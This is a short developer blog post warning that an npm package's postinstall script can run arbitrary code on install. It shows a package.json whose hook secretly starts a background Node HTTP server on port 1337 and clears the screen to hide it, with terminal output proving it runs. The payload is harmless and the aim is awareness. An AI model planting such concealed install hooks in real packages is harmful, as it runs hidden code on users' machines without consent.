Last Updated: February 25, 2016
·
1.487K
· johannesboyne

node security: npm bad use of postinstall (don't do bad things with node)

Can an npm package you installed infiltrate your computer? Yes it can! See how after the break; go and support the NODE SECURITY PROJECT

Github Repo: https://github.com/johannesboyne/dontdobadthingswithnode

Look at the following example, it is a minimal npm package.json but if I write it like this, I am able to do whatever I want on your system if you are going to install my package. Like starting a webserver on port 1337 and hiding it from you.

{
  "name": "test",
  "scripts": {
    "postinstall": "echo 'var http=require(\"http\");http.createServer(function (req, res) {res.writeHead(200, {\"Content-Type\": \"text/plain\"}); res.end(\"hi, i just started a background http server at your system. You should be patient! \");}).listen(1337);//console.log(\"Server running at http://127.0.0.1:1337/\")' | node & clear;"
  }
}
$ ps
  PID TTY           TIME CMD
  586 ttys000    0:00.55 /bin/zsh
  903 ttys001    0:00.07 /bin/zsh

$ npm install
$ 

$ ps
  PID TTY           TIME CMD
  586 ttys000    0:00.56 /bin/zsh
 1555 ttys000    0:00.05 node
  903 ttys001    0:00.07 /bin/zsh

$ curl localhost:1337
hi, i just started a background http server at your system. You should be patient! %

as you can see, I am piping a text string to node, putting the node process into the background and clearing the screen. So, please be mindful and support security projects.